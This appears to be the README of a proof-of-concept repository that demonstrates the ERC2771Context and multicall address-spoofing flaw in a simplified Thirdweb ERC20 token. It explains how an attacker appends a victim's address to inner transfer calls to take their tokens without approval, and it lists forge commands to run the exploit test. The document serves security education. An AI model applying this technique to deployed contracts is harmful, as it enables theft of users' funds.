The repository contains three main contracts

1. Forwarder.sol - Mimics the working of a relayer, the attacker calls the function on it and it forwards the call to the erc20 token.
2. ThirdWebErc20.sol - It is a simplified contract that has the vulnerable multi-call functionality and inherits from open zeppelin ERC2771Context, and together both these make the token vulnerable.

Let's say two users cats and nirlin have been minted 100 tokens each.

Now cats decide to go crazy and rogue and decide to wear a blackhat, cats can craft a set of a malicious transfer transaction, where each inner transaction have nirlin address appened to it, these will pass all the system validation and will transfer the tokens of nirlin to cats without any approval.

You can read more about the details of how this works in the following breakdowns:

• Openzeppelin Down
• Thirdweb Breakdown
• Cygaar

$ forge build

$ forge test --match-test testMaliciousTransfer -vv